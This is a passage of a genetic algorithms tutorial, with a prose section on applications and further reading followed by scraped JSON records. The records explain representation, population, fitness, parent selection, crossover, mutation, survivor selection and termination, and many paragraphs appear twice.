assigned to partial solutions. The Michigan Approach − one solution is typically represented by many chromosomes and so fitness is assigned to partial solutions. It should be kept in mind that the standard issue like crossover, mutation, Lamarckian or Darwinian, etc. are also present in the GBML systems. Genetic Algorithms are primarily used in optimization problems of various kinds, but they are frequently used in other application areas as well. In this section, we list some of the areas in which Genetic Algorithms are frequently used. These are − Optimization − Genetic Algorithms are most commonly used in optimization problems wherein we have to maximize or minimize a given objective function value under a given set of constraints. The approach to solve Optimization problems has been highlighted throughout the tutorial. Optimization − Genetic Algorithms are most commonly used in optimization problems wherein we have to maximize or minimize a given objective function value under a given set of constraints. The approach to solve Optimization problems has been highlighted throughout the tutorial. Economics − GAs are also used to characterize various economic models like the cobweb model, game theory equilibrium resolution, asset pricing, etc. Economics − GAs are also used to characterize various economic models like the cobweb model, game theory equilibrium resolution, asset pricing, etc. Neural Networks − GAs are also used to train neural networks, particularly recurrent neural networks. Neural Networks − GAs are also used to train neural networks, particularly recurrent neural networks. Parallelization − GAs also have very good parallel capabilities, and prove to be very effective means in solving certain problems, and also provide a good area for research. Parallelization − GAs also have very good parallel capabilities, and prove to be very effective means in solving certain problems, and also provide a good area for research. Image Processing − GAs are used for various digital image processing (DIP) tasks as well like dense pixel matching. Image Processing − GAs are used for various digital image processing (DIP) tasks as well like dense pixel matching. Vehicle routing problems − With multiple soft time windows, multiple depots and a heterogeneous fleet. Vehicle routing problems − With multiple soft time windows, multiple depots and a heterogeneous fleet. Scheduling applications − GAs are used to solve various scheduling problems as well, particularly the time tabling problem. Scheduling applications − GAs are used to solve various scheduling problems as well, particularly the time tabling problem. Machine Learning − as already discussed, genetics based machine learning (GBML) is a niche area in machine learning. Machine Learning − as already discussed, genetics based machine learning (GBML) is a niche area in machine learning. Robot Trajectory Generation − GAs have been used to plan the path which a robot arm takes by moving from one point to another. Robot Trajectory Generation − GAs have been used to plan the path which a robot arm takes by moving from one point to another. Parametric Design of Aircraft − GAs have been used to design aircrafts by varying the parameters and evolving better solutions. Parametric Design of Aircraft − GAs have been used to design aircrafts by varying the parameters and evolving better solutions. DNA Analysis − GAs have been used to determine the structure of DNA using spectrometric data about the sample. DNA Analysis − GAs have been used to determine the structure of DNA using spectrometric data about the sample. Multimodal Optimization − GAs are obviously very good approaches for multimodal optimization in which we have to find multiple optimum solutions. Multimodal Optimization − GAs are obviously very good approaches for multimodal optimization in which we have to find multiple optimum solutions. Traveling salesman problem and its applications − GAs have been used to solve the TSP, which is a well-known combinatorial problem using novel crossover and packing strategies. Traveling salesman problem and its applications − GAs have been used to solve the TSP, which is a well-known combinatorial problem using novel crossover and packing strategies. The following books can be referred to further enhance the reader’s knowledge of Genetic Algorithms, and Evolutionary Computation in general − Genetic Algorithms in Search, Optimization and Machine Learning by David E. Goldberg. Genetic Algorithms in Search, Optimization and Machine Learning by David E. Goldberg. Genetic Algorithms + Data Structures = Evolutionary Programs by Zbigniew Michalewicz. Genetic Algorithms + Data Structures = Evolutionary Programs by Zbigniew Michalewicz. Practical Genetic Algorithms by Randy L. Haupt and Sue Ellen Haupt. Practical Genetic Algorithms by Randy L. Haupt and Sue Ellen Haupt. Multi Objective Optimization using Evolutionary Algorithms by Kalyanmoy Deb. Multi Objective Optimization using Evolutionary Algorithms by Kalyanmoy Deb. Print Add Notes Bookmark this page
[ { "code": null, "e": 2390, "s": 2041, "text": "Genetic Algorithm (GA) is a search-based optimization technique based on the principles of Genetics and Natural Selection. It is frequently used to find optimal or near-optimal solutions to difficult problems which otherwise would take a lifetime to solve. It is frequently used to solve optimization problems, in research, and in machine learning." }, { "code": null, "e": 2541, "s": 2390, "text": "Optimization is the process of making something better. In any process, we have a set of inputs and a set of outputs as shown in the following figure." }, { "code": null, "e": 2833, "s": 2541, "text": "Optimization refers to finding the values of inputs in such a way that we get the “best” output values. The definition of “best” varies from problem to problem, but in mathematical terms, it refers to maximizing or minimizing one or more objective functions, by varying the input parameters." }, { "code": null, "e": 3101, "s": 2833, "text": "The set of all possible solutions or values which the inputs can take make up the search space. In this search space, lies a point or a set of points which gives the optimal solution. The aim of optimization is to find that point or set of points in the search space." }, { "code": null, "e": 3371, "s": 3101, "text": "Nature has always been a great source of inspiration to all mankind. Genetic Algorithms (GAs) are search based algorithms based on the concepts of natural selection and genetics. GAs are a subset of a much larger branch of computation known as Evolutionary Computation." }, { "code": null, "e": 3589, "s": 3371, "text": "GAs were developed by John Holland and his students and colleagues at the University of Michigan, most notably David E. Goldberg and has since been tried on various optimization problems with a high degree of success." }, { "code": null, "e": 4112, "s": 3589, "text": "In GAs, we have a pool or a population of possible solutions to the given problem. These solutions then undergo recombination and mutation (like in natural genetics), producing new children, and the process is repeated over various generations. Each individual (or candidate solution) is assigned a fitness value (based on its objective function value) and the fitter individuals are given a higher chance to mate and yield more “fitter” individuals. This is in line with the Darwinian Theory of “Survival of the Fittest”." }, { "code": null, "e": 4229, "s": 4112, "text": "In this way we keep “evolving” better individuals or solutions over generations, till we reach a stopping criterion." }, { "code": null, "e": 4472, "s": 4229, "text": "Genetic Algorithms are sufficiently randomized in nature, but they perform much better than random local search (in which we just try various random solutions, keeping track of the best so far), as they exploit historical information as well." }, { "code": null, "e": 4556, "s": 4472, "text": "GAs have various advantages which have made them immensely popular. These include −" }, { "code": null, "e": 4659, "s": 4556, "text": "Does not require any derivative information (which may not be available for many real-world problems)." }, { "code": null, "e": 4762, "s": 4659, "text": "Does not require any derivative information (which may not be available for many real-world problems)." }, { "code": null, "e": 4831, "s": 4762, "text": "Is faster and more efficient as compared to the traditional methods." }, { "code": null, "e": 4900, "s": 4831, "text": "Is faster and more efficient as compared to the traditional methods." }, { "code": null, "e": 4937, "s": 4900, "text": "Has very good parallel capabilities." }, { "code": null, "e": 4974, "s": 4937, "text": "Has very good parallel capabilities." }, { "code": null, "e": 5058, "s": 4974, "text": "Optimizes both continuous and discrete functions and also multi-objective problems." }, { "code": null, "e": 5142, "s": 5058, "text": "Optimizes both continuous and discrete functions and also multi-objective problems." }, { "code": null, "e": 5210, "s": 5142, "text": "Provides a list of “good” solutions and not just a single solution." }, { "code": null, "e": 5278, "s": 5210, "text": "Provides a list of “good” solutions and not just a single solution." }, { "code": null, "e": 5349, "s": 5278, "text": "Always gets an answer to the problem, which gets better over the time." }, { "code": null, "e": 5420, "s": 5349, "text": "Always gets an answer to the problem, which gets better over the time." }, { "code": null, "e": 5516, "s": 5420, "text": "Useful when the search space is very large and there are a large number of parameters involved." }, { "code": null, "e": 5612, "s": 5516, "text": "Useful when the search space is very large and there are a large number of parameters involved." }, { "code": null, "e": 5688, "s": 5612, "text": "Like any technique, GAs also suffer from a few limitations. These include −" }, { "code": null, "e": 5813, "s": 5688, "text": "GAs are not suited for all problems, especially problems which are simple and for which derivative information is available." }, { "code": null, "e": 5938, "s": 5813, "text": "GAs are not suited for all problems, especially problems which are simple and for which derivative information is available." }, { "code": null, "e": 6037, "s": 5938, "text": "Fitness value is calculated repeatedly which might be computationally expensive for some problems." }, { "code": null, "e": 6136, "s": 6037, "text": "Fitness value is calculated repeatedly which might be computationally expensive for some problems." }, { "code": null, "e": 6228, "s": 6136, "text": "Being stochastic, there are no guarantees on the optimality or the quality of the solution." }, { "code": null, "e": 6320, "s": 6228, "text": "Being stochastic, there are no guarantees on the optimality or the quality of the solution." }, { "code": null, "e": 6398, "s": 6320, "text": "If not implemented properly, the GA may not converge to the optimal solution." }, { "code": null, "e": 6476, "s": 6398, "text": "If not implemented properly, the GA may not converge to the optimal solution." }, { "code": null, "e": 6694, "s": 6476, "text": "Genetic Algorithms have the ability to deliver a “good-enough” solution “fast-enough”. This makes genetic algorithms attractive for use in solving optimization problems. The reasons why GAs are needed are as follows −" }, { "code": null, "e": 7027, "s": 6694, "text": "In computer science, there is a large set of problems, which are NP-Hard. What this essentially means is that, even the most powerful computing systems take a very long time (even years!) to solve that problem. In such a scenario, GAs prove to be an efficient tool to provide usable near-optimal solutions in a short amount of time." }, { "code": null, "e": 7594, "s": 7027, "text": "Traditional calculus based methods work by starting at a random point and by moving in the direction of the gradient, till we reach the top of the hill. This technique is efficient and works very well for single-peaked objective functions like the cost function in linear regression. But, in most real-world situations, we have a very complex problem called as landscapes, which are made of many peaks and many valleys, which causes such methods to fail, as they suffer from an inherent tendency of getting stuck at the local optima as shown in the following figure." }, { "code": null, "e": 8042, "s": 7594, "text": "Some difficult problems like the Travelling Salesperson Problem (TSP), have real-world applications like path finding and VLSI Design. Now imagine that you are using your GPS Navigation system, and it takes a few minutes (or even a few hours) to compute the “optimal” path from the source to destination. Delay in such real world applications is not acceptable and therefore a “good-enough” solution, which is delivered “fast” is what is required." }, { "code": null, "e": 8368, "s": 8042, "text": "This section introduces the basic terminology required to understand GAs. Also, a generic structure of GAs is presented in both pseudo-code and graphical forms. The reader is advised to properly understand all the concepts introduced in this section and keep them in mind when reading other sections of this tutorial as well." }, { "code": null, "e": 8525, "s": 8368, "text": "Before beginning a discussion on Genetic Algorithms, it is essential to be familiar with some basic terminology which will be used throughout this tutorial." }, { "code": null, "e": 8779, "s": 8525, "text": "Population − It is a subset of all the possible (encoded) solutions to the given problem. The population for a GA is analogous to the population for human beings except that instead of human beings, we have Candidate Solutions representing human beings." }, { "code": null, "e": 9033, "s": 8779, "text": "Population − It is a subset of all the possible (encoded) solutions to the given problem. The population for a GA is analogous to the population for human beings except that instead of human beings, we have Candidate Solutions representing human beings." }, { "code": null, "e": 9103, "s": 9033, "text": "Chromosomes − A chromosome is one such solution to the given problem." }, { "code": null, "e": 9173, "s": 9103, "text": "Chromosomes − A chromosome is one such solution to the given problem." }, { "code": null, "e": 9228, "s": 9173, "text": "Gene − A gene is one element position of a chromosome." }, { "code": null, "e": 9283, "s": 9228, "text": "Gene − A gene is one element position of a chromosome." }, { "code": null, "e": 9350, "s": 9283, "text": "Allele − It is the value a gene takes for a particular chromosome." }, { "code": null, "e": 9417, "s": 9350, "text": "Allele − It is the value a gene takes for a particular chromosome." }, { "code": null, "e": 9619, "s": 9417, "text": "Genotype − Genotype is the population in the computation space. In the computation space, the solutions are represented in a way which can be easily understood and manipulated using a computing system." }, { "code": null, "e": 9821, "s": 9619, "text": "Genotype − Genotype is the population in the computation space. In the computation space, the solutions are represented in a way which can be easily understood and manipulated using a computing system." }, { "code": null, "e": 9992, "s": 9821, "text": "Phenotype − Phenotype is the population in the actual real world solution space in which solutions are represented in a way they are represented in real world situations." }, { "code": null, "e": 10163, "s": 9992, "text": "Phenotype − Phenotype is the population in the actual real world solution space in which solutions are represented in a way they are represented in real world situations." }, { "code": null, "e": 11036, "s": 10163, "text": "Decoding and Encoding − For simple problems, the phenotype and genotype spaces are the same. However, in most of the cases, the phenotype and genotype spaces are different. Decoding is a process of transforming a solution from the genotype to the phenotype space, while encoding is a process of transforming from the phenotype to genotype space. Decoding should be fast as it is carried out repeatedly in a GA during the fitness value calculation.\nFor example, consider the 0/1 Knapsack Problem. The Phenotype space consists of solutions which just contain the item numbers of the items to be picked.\nHowever, in the genotype space it can be represented as a binary string of length n (where n is the number of items). A 0 at position x represents that xth item is picked while a 1 represents the reverse. This is a case where genotype and phenotype spaces are different.\n" }, { "code": null, "e": 11484, "s": 11036, "text": "Decoding and Encoding − For simple problems, the phenotype and genotype spaces are the same. However, in most of the cases, the phenotype and genotype spaces are different. Decoding is a process of transforming a solution from the genotype to the phenotype space, while encoding is a process of transforming from the phenotype to genotype space. Decoding should be fast as it is carried out repeatedly in a GA during the fitness value calculation." }, { "code": null, "e": 11637, "s": 11484, "text": "For example, consider the 0/1 Knapsack Problem. The Phenotype space consists of solutions which just contain the item numbers of the items to be picked." }, { "code": null, "e": 11908, "s": 11637, "text": "However, in the genotype space it can be represented as a binary string of length n (where n is the number of items). A 0 at position x represents that xth item is picked while a 1 represents the reverse. This is a case where genotype and phenotype spaces are different." }, { "code": null, "e": 12209, "s": 11908, "text": "Fitness Function − A fitness function simply defined is a function which takes the solution as input and produces the suitability of the solution as the output. In some cases, the fitness function and the objective function may be the same, while in others it might be different based on the problem." }, { "code": null, "e": 12510, "s": 12209, "text": "Fitness Function − A fitness function simply defined is a function which takes the solution as input and produces the suitability of the solution as the output. In some cases, the fitness function and the objective function may be the same, while in others it might be different based on the problem." }, { "code": null, "e": 12635, "s": 12510, "text": "Genetic Operators − These alter the genetic composition of the offspring. These include crossover, mutation, selection, etc." }, { "code": null, "e": 12760, "s": 12635, "text": "Genetic Operators − These alter the genetic composition of the offspring. These include crossover, mutation, selection, etc." }, { "code": null, "e": 12804, "s": 12760, "text": "The basic structure of a GA is as follows −" }, { "code": null, "e": 13232, "s": 12804, "text": "We start with an initial population (which may be generated at random or seeded by other heuristics), select parents from this population for mating. Apply crossover and mutation operators on the parents to generate new off-springs. And finally these off-springs replace the existing individuals in the population and the process repeats. In this way genetic algorithms actually try to mimic the human evolution to some extent." }, { "code": null, "e": 13318, "s": 13232, "text": "Each of the following steps are covered as a separate chapter later in this tutorial." }, { "code": null, "e": 13393, "s": 13318, "text": "A generalized pseudo-code for a GA is explained in the following program −" }, { "code": null, "e": 13691, "s": 13393, "text": "GA()\n initialize population\n find fitness of population\n \n while (termination criteria is reached) do\n parent selection\n crossover with probability pc\n mutation with probability pm\n decode and fitness calculation\n survivor selection\n find best\n return best\n" }, { "code": null, "e": 13940, "s": 13691, "text": "One of the most important decisions to make while implementing a genetic algorithm is deciding the representation that we will use to represent our solutions. It has been observed that improper representation can lead to poor performance of the GA." }, { "code": null, "e": 14108, "s": 13940, "text": "Therefore, choosing a proper representation, having a proper definition of the mappings between the phenotype and genotype spaces is essential for the success of a GA." }, { "code": null, "e": 14394, "s": 14108, "text": "In this section, we present some of the most commonly used representations for genetic algorithms. However, representation is highly problem specific and the reader might find that another representation or a mix of the representations mentioned here might suit his/her problem better." }, { "code": null, "e": 14535, "s": 14394, "text": "This is one of the simplest and most widely used representation in GAs. In this type of representation the genotype consists of bit strings." }, { "code": null, "e": 14867, "s": 14535, "text": "For some problems when the solution space consists of Boolean decision variables – yes or no, the binary representation is natural. Take for example the 0/1 Knapsack Problem. If there are n items, we can represent a solution by a binary string of n elements, where the xth element tells whether the item x is picked (1) or not (0)." }, { "code": null, "e": 15290, "s": 14867, "text": "For other problems, specifically those dealing with numbers, we can represent the numbers with their binary representation. The problem with this kind of encoding is that different bits have different significance and therefore mutation and crossover operators can have undesired consequences. This can be resolved to some extent by using Gray Coding, as a change in one bit does not have a massive effect on the solution." }, { "code": null, "e": 15535, "s": 15290, "text": "For problems where we want to define the genes using continuous rather than discrete variables, the real valued representation is the most natural. The precision of these real valued or floating point numbers is however limited to the computer." }, { "code": null, "e": 15798, "s": 15535, "text": "For discrete valued genes, we cannot always limit the solution space to binary ‘yes’ or ‘no’. For example, if we want to encode the four distances – North, South, East and West, we can encode them as {0,1,2,3}. In such cases, integer representation is desirable." }, { "code": null, "e": 15930, "s": 15798, "text": "In many problems, the solution is represented by an order of elements. In such cases permutation representation is the most suited." }, { "code": null, "e": 16354, "s": 15930, "text": "A classic example of this representation is the travelling salesman problem (TSP). In this the salesman has to take a tour of all the cities, visiting each city exactly once and come back to the starting city. The total distance of the tour has to be minimized. The solution to this TSP is naturally an ordering or permutation of all the cities and therefore using a permutation representation makes sense for this problem." }, { "code": null, "e": 16543, "s": 16354, "text": "Population is a subset of solutions in the current generation. It can also be defined as a set of chromosomes. There are several things to be kept in mind when dealing with GA population −" }, { "code": null, "e": 16646, "s": 16543, "text": "The diversity of the population should be maintained otherwise it might lead to premature convergence." }, { "code": null, "e": 16749, "s": 16646, "text": "The diversity of the population should be maintained otherwise it might lead to premature convergence." }, { "code": null, "e": 16983, "s": 16749, "text": "The population size should not be kept very large as it can cause a GA to slow down, while a smaller population might not be enough for a good mating pool. Therefore, an optimal population size needs to be decided by trial and error." }, { "code": null, "e": 17217, "s": 16983, "text": "The population size should not be kept very large as it can cause a GA to slow down, while a smaller population might not be enough for a good mating pool. Therefore, an optimal population size needs to be decided by trial and error." }, { "code": null, "e": 17325, "s": 17217, "text": "The population is usually defined as a two dimensional array of – size population, size x, chromosome size." }, { "code": null, "e": 17402, "s": 17325, "text": "There are two primary methods to initialize a population in a GA. They are −" }, { "code": null, "e": 17492, "s": 17402, "text": "Random Initialization − Populate the initial population with completely random solutions." }, { "code": null, "e": 17582, "s": 17492, "text": "Random Initialization − Populate the initial population with completely random solutions." }, { "code": null, "e": 17682, "s": 17582, "text": "Heuristic initialization − Populate the initial population using a known heuristic for the problem." }, { "code": null, "e": 17782, "s": 17682, "text": "Heuristic initialization − Populate the initial population using a known heuristic for the problem." }, { "code": null, "e": 18295, "s": 17782, "text": "It has been observed that the entire population should not be initialized using a heuristic, as it can result in the population having similar solutions and very little diversity. It has been experimentally observed that the random solutions are the ones to drive the population to optimality. Therefore, with heuristic initialization, we just seed the population with a couple of good solutions, filling up the rest with random solutions rather than filling the entire population with heuristic based solutions." }, { "code": null, "e": 18497, "s": 18295, "text": "It has also been observed that heuristic initialization in some cases, only effects the initial fitness of the population, but in the end, it is the diversity of the solutions which lead to optimality." }, { "code": null, "e": 18545, "s": 18497, "text": "There are two population models widely in use −" }, { "code": null, "e": 18730, "s": 18545, "text": "In steady state GA, we generate one or two off-springs in each iteration and they replace one or two individuals from the population. A steady state GA is also known as Incremental GA." }, { "code": null, "e": 18898, "s": 18730, "text": "In a generational model, we generate ‘n’ off-springs, where n is the population size, and the entire population is replaced by the new one at the end of the iteration." }, { "code": null, "e": 19115, "s": 18898, "text": "The fitness function simply defined is a function which takes a candidate solution to the problem as input and produces as output how “fit” our how “good” the solution is with respect to the problem in consideration." }, { "code": null, "e": 19315, "s": 19115, "text": "Calculation of fitness value is done repeatedly in a GA and therefore it should be sufficiently fast. A slow computation of the fitness value can adversely affect a GA and make it exceptionally slow." }, { "code": null, "e": 19621, "s": 19315, "text": "In most cases the fitness function and the objective function are the same as the objective is to either maximize or minimize the given objective function. However, for more complex problems with multiple objectives and constraints, an Algorithm Designer might choose to have a different fitness function." }, { "code": null, "e": 19687, "s": 19621, "text": "A fitness function should possess the following characteristics −" }, { "code": null, "e": 19748, "s": 19687, "text": "The fitness function should be sufficiently fast to compute." }, { "code": null, "e": 19809, "s": 19748, "text": "The fitness function should be sufficiently fast to compute." }, { "code": null, "e": 19932, "s": 19809, "text": "It must quantitatively measure how fit a given solution is or how fit individuals can be produced from the given solution." }, { "code": null, "e": 20055, "s": 19932, "text": "It must quantitatively measure how fit a given solution is or how fit individuals can be produced from the given solution." }, { "code": null, "e": 20253, "s": 20055, "text": "In some cases, calculating the fitness function directly might not be possible due to the inherent complexities of the problem at hand. In such cases, we do fitness approximation to suit our needs." }, { "code": null, "e": 20517, "s": 20253, "text": "The following image shows the fitness calculation for a solution of the 0/1 Knapsack. It is a simple fitness function which just sums the profit values of the items being picked (which have a 1), scanning the elements from left to right till the knapsack is full." }, { "code": null, "e": 20777, "s": 20517, "text": "Parent Selection is the process of selecting parents which mate and recombine to create off-springs for the next generation. Parent selection is very crucial to the convergence rate of the GA as good parents drive individuals to a better and fitter solutions." }, { "code": null, "e": 21262, "s": 20777, "text": "However, care should be taken to prevent one extremely fit solution from taking over the entire population in a few generations, as this leads to the solutions being close to one another in the solution space thereby leading to a loss of diversity. Maintaining good diversity in the population is extremely crucial for the success of a GA. This taking up of the entire population by one extremely fit solution is known as premature convergence and is an undesirable condition in a GA." }, { "code": null, "e": 21717, "s": 21262, "text": "Fitness Proportionate Selection is one of the most popular ways of parent selection. In this every individual can become a parent with a probability which is proportional to its fitness. Therefore, fitter individuals have a higher chance of mating and propagating their features to the next generation. Therefore, such a selection strategy applies a selection pressure to the more fit individuals in the population, evolving better individuals over time." }, { "code": null, "e": 21923, "s": 21717, "text": "Consider a circular wheel. The wheel is divided into n pies, where n is the number of individuals in the population. Each individual gets a portion of the circle which is proportional to its fitness value." }, { "code": null, "e": 21993, "s": 21923, "text": "Two implementations of fitness proportionate selection are possible −" }, { "code": null, "e": 22303, "s": 21993, "text": "In a roulette wheel selection, the circular wheel is divided as described before. A fixed point is chosen on the wheel circumference as shown and the wheel is rotated. The region of the wheel which comes in front of the fixed point is chosen as the parent. For the second parent, the same process is repeated." }, { "code": null, "e": 22554, "s": 22303, "text": "It is clear that a fitter individual has a greater pie on the wheel and therefore a greater chance of landing in front of the fixed point when the wheel is rotated. Therefore, the probability of choosing an individual depends directly on its fitness." }, { "code": null, "e": 22604, "s": 22554, "text": "Implementation wise, we use the following steps −" }, { "code": null, "e": 22641, "s": 22604, "text": "Calculate S = the sum of a finesses." }, { "code": null, "e": 22678, "s": 22641, "text": "Calculate S = the sum of a finesses." }, { "code": null, "e": 22720, "s": 22678, "text": "Generate a random number between 0 and S." }, { "code": null, "e": 22762, "s": 22720, "text": "Generate a random number between 0 and S." }, { "code": null, "e": 22860, "s": 22762, "text": "Starting from the top of the population, keep adding the finesses to the partial sum P, till P<S." }, { "code": null, "e": 22958, "s": 22860, "text": "Starting from the top of the population, keep adding the finesses to the partial sum P, till P<S." }, { "code": null, "e": 23021, "s": 22958, "text": "The individual for which P exceeds S is the chosen individual." }, { "code": null, "e": 23084, "s": 23021, "text": "The individual for which P exceeds S is the chosen individual." }, { "code": null, "e": 23425, "s": 23084, "text": "Stochastic Universal Sampling is quite similar to Roulette wheel selection, however instead of having just one fixed point, we have multiple fixed points as shown in the following image. Therefore, all the parents are chosen in just one spin of the wheel. Also, such a setup encourages the highly fit individuals to be chosen at least once." }, { "code": null, "e": 23554, "s": 23425, "text": "It is to be noted that fitness proportionate selection methods don’t work for cases where the fitness can take a negative value." }, { "code": null, "e": 23863, "s": 23554, "text": "In K-Way tournament selection, we select K individuals from the population at random and select the best out of these to become a parent. The same process is repeated for selecting the next parent. Tournament Selection is also extremely popular in literature as it can even work with negative fitness values." }, { "code": null, "e": 24491, "s": 23863, "text": "Rank Selection also works with negative fitness values and is mostly used when the individuals in the population have very close fitness values (this happens usually at the end of the run). This leads to each individual having an almost equal share of the pie (like in case of fitness proportionate selection) as shown in the following image and hence each individual no matter how fit relative to each other has an approximately same probability of getting selected as a parent. This in turn leads to a loss in the selection pressure towards fitter individuals, making the GA to make poor parent selections in such situations." }, { "code": null, "e": 24815, "s": 24491, "text": "In this, we remove the concept of a fitness value while selecting a parent. However, every individual in the population is ranked according to their fitness. The selection of the parents depends on the rank of each individual and not the fitness. The higher ranked individuals are preferred more than the lower ranked ones." }, { "code": null, "e": 24995, "s": 24815, "text": "In this strategy we randomly select parents from the existing population. There is no selection pressure towards fitter individuals and therefore this strategy is usually avoided." }, { "code": null, "e": 25118, "s": 24995, "text": "In this chapter, we will discuss about what a Crossover Operator is along with its other modules, their uses and benefits." }, { "code": null, "e": 25389, "s": 25118, "text": "The crossover operator is analogous to reproduction and biological crossover. In this more than one parent is selected and one or more off-springs are produced using the genetic material of the parents. Crossover is usually applied in a GA with a high probability – pc ." }, { "code": null, "e": 25633, "s": 25389, "text": "In this section we will discuss some of the most popularly used crossover operators. It is to be noted that these crossover operators are very generic and the GA Designer might choose to implement a problem-specific crossover operator as well." }, { "code": null, "e": 25768, "s": 25633, "text": "In this one-point crossover, a random crossover point is selected and the tails of its two parents are swapped to get new off-springs." }, { "code": null, "e": 25902, "s": 25768, "text": "Multi point crossover is a generalization of the one-point crossover wherein alternating segments are swapped to get new off-springs." }, { "code": null, "e": 26230, "s": 25902, "text": "In a uniform crossover, we don’t divide the chromosome into segments, rather we treat each gene separately. In this, we essentially flip a coin for each chromosome to decide whether or not it’ll be included in the off-spring. We can also bias the coin to one parent, to have more genetic material in the child from that parent." }, { "code": null, "e": 26374, "s": 26230, "text": "This is commonly used for integer representations and works by taking the weighted average of the two parents by using the following formulae −" }, { "code": null, "e": 26397, "s": 26374, "text": "Child1 = α.x + (1-α).y" }, { "code": null, "e": 26420, "s": 26397, "text": "Child2 = α.x + (1-α).y" }, { "code": null, "e": 26517, "s": 26420, "text": "Obviously, if α = 0.5, then both the children will be identical as shown in the following image." }, { "code": null, "e": 26675, "s": 26517, "text": "OX1 is used for permutation based crossovers with the intention of transmitting information about relative ordering to the off-springs. It works as follows −" }, { "code": null, "e": 26804, "s": 26675, "text": "Create two random crossover points in the parent and copy the segment between them from the first parent to the first offspring." }, { "code": null, "e": 26933, "s": 26804, "text": "Create two random crossover points in the parent and copy the segment between them from the first parent to the first offspring." }, { "code": null, "e": 27104, "s": 26933, "text": "Now, starting from the second crossover point in the second parent, copy the remaining unused numbers from the second parent to the first child, wrapping around the list." }, { "code": null, "e": 27275, "s": 27104, "text": "Now, starting from the second crossover point in the second parent, copy the remaining unused numbers from the second parent to the first child, wrapping around the list." }, { "code": null, "e": 27336, "s": 27275, "text": "Repeat for the second child with the parent’s role reversed." }, { "code": null, "e": 27397, "s": 27336, "text": "Repeat for the second child with the parent’s role reversed." }, { "code": null, "e": 27543, "s": 27397, "text": "There exist a lot of other crossovers like Partially Mapped Crossover (PMX), Order based crossover (OX2), Shuffle Crossover, Ring Crossover, etc." }, { "code": null, "e": 27848, "s": 27543, "text": "In simple terms, mutation may be defined as a small random tweak in the chromosome, to get a new solution. It is used to maintain and introduce diversity in the genetic population and is usually applied with a low probability – pm. If the probability is very high, the GA gets reduced to a random search." }, { "code": null, "e": 28039, "s": 27848, "text": "Mutation is the part of the GA which is related to the “exploration” of the search space. It has been observed that mutation is essential to the convergence of the GA while crossover is not." }, { "code": null, "e": 28298, "s": 28039, "text": "In this section, we describe some of the most commonly used mutation operators. Like the crossover operators, this is not an exhaustive list and the GA designer might find a combination of these approaches or a problem-specific mutation operator more useful." }, { "code": null, "e": 28411, "s": 28298, "text": "In this bit flip mutation, we select one or more random bits and flip them. This is used for binary encoded GAs." }, { "code": null, "e": 28590, "s": 28411, "text": "Random Resetting is an extension of the bit flip for the integer representation. In this, a random value from the set of permissible values is assigned to a randomly chosen gene." }, { "code": null, "e": 28736, "s": 28590, "text": "In swap mutation, we select two positions on the chromosome at random, and interchange the values. This is common in permutation based encodings." }, { "code": null, "e": 28922, "s": 28736, "text": "Scramble mutation is also popular with permutation representations. In this, from the entire chromosome, a subset of genes is chosen and their values are scrambled or shuffled randomly." }, { "code": null, "e": 29087, "s": 28922, "text": "In inversion mutation, we select a subset of genes like in scramble mutation, but instead of shuffling the subset, we merely invert the entire string in the subset." }, { "code": null, "e": 29389, "s": 29087, "text": "The Survivor Selection Policy determines which individuals are to be kicked out and which are to be kept in the next generation. It is crucial as it should ensure that the fitter individuals are not kicked out of the population, while at the same time diversity should be maintained in the population." }, { "code": null, "e": 29625, "s": 29389, "text": "Some GAs employ Elitism. In simple terms, it means the current fittest member of the population is always propagated to the next generation. Therefore, under no circumstance can the fittest member of the current population be replaced." }, { "code": null, "e": 29801, "s": 29625, "text": "The easiest policy is to kick random members out of the population, but such an approach frequently has convergence issues, therefore the following strategies are widely used." }, { "code": null, "e": 30079, "s": 29801, "text": "In Age-Based Selection, we don’t have a notion of a fitness. It is based on the premise that each individual is allowed in the population for a finite generation where it is allowed to reproduce, after that, it is kicked out of the population no matter how good its fitness is." }, { "code": null, "e": 30358, "s": 30079, "text": "For instance, in the following example, the age is the number of generations for which the individual has been in the population. The oldest members of the population i.e. P4 and P7 are kicked out of the population and the ages of the rest of the members are incremented by one." }, { "code": null, "e": 30650, "s": 30358, "text": "In this fitness based selection, the children tend to replace the least fit individuals in the population. The selection of the least fit individuals may be done using a variation of any of the selection policies described before – tournament selection, fitness proportionate selection, etc." }, { "code": null, "e": 30906, "s": 30650, "text": "For example, in the following image, the children replace the least fit individuals P1 and P10 of the population. It is to be noted that since P1 and P9 have the same fitness value, the decision to remove which individual from the population is arbitrary." }, { "code": null, "e": 31323, "s": 30906, "text": "The termination condition of a Genetic Algorithm is important in determining when a GA run will end. It has been observed that initially, the GA progresses very fast with better solutions coming in every few iterations, but this tends to saturate in the later stages where the improvements are very small. We usually want a termination condition such that our solution is close to the optimal, at the end of the run." }, { "code": null, "e": 31386, "s": 31323, "text": "Usually, we keep one of the following termination conditions −" }, { "code": null, "e": 31457, "s": 31386, "text": "When there has been no improvement in the population for X iterations." }, { "code": null, "e": 31506, "s": 31457, "text": "When we reach an absolute number of generations." }, { "code": null, "e": 31581, "s": 31506, "text": "When the objective function value has reached a certain pre-defined value." }, { "code": null, "e": 31894, "s": 31581, "text": "For example, in a genetic algorithm we keep a counter which keeps track of the generations for which there has been no improvement in the population. Initially, we set this counter to zero. Each time we don’t generate off-springs which are better than the individuals in the population, we increment the counter." }, { "code": null, "e": 32060, "s": 31894, "text": "However, if the fitness any of the off-springs is better, then we reset the counter to zero. The algorithm terminates when the counter reaches a predetermined value." }, { "code": null, "e": 32251, "s": 32060, "text": "Like other parameters of a GA, the termination condition is also highly problem specific and the GA designer should try out various options to see what suits his particular problem the best." }, { "code": null, "e": 32619, "s": 32251, "text": "Till now in this tutorial, whatever we have discussed corresponds to the Darwinian model of evolution – natural selection and genetic variation through recombination and mutation. In nature, only the information contained in the individual’s genotype can be transmitted to the next generation. This is the approach which we have been following in the tutorial so far." }, { "code": null, "e": 32902, "s": 32619, "text": "However, other models of lifetime adaptation – Lamarckian Model and Baldwinian Model also do exist. It is to be noted that whichever model is the best, is open for debate and the results obtained by researchers show that the choice of lifetime adaptation is highly problem specific." }, { "code": null, "e": 33128, "s": 32902, "text": "Often, we hybridize a GA with local search – like in Memetic Algorithms. In such cases, one might choose do go with either Lamarckian or Baldwinian Model to decide what to do with individuals generated after the local search." }, { "code": null, "e": 33324, "s": 33128, "text": "The Lamarckian Model essentially says that the traits which an individual acquires in his/her lifetime can be passed on to its offspring. It is named after French biologist Jean-Baptiste Lamarck." }, { "code": null, "e": 33606, "s": 33324, "text": "Even though, natural biology has completely disregarded Lamarckism as we all know that only the information in the genotype can be 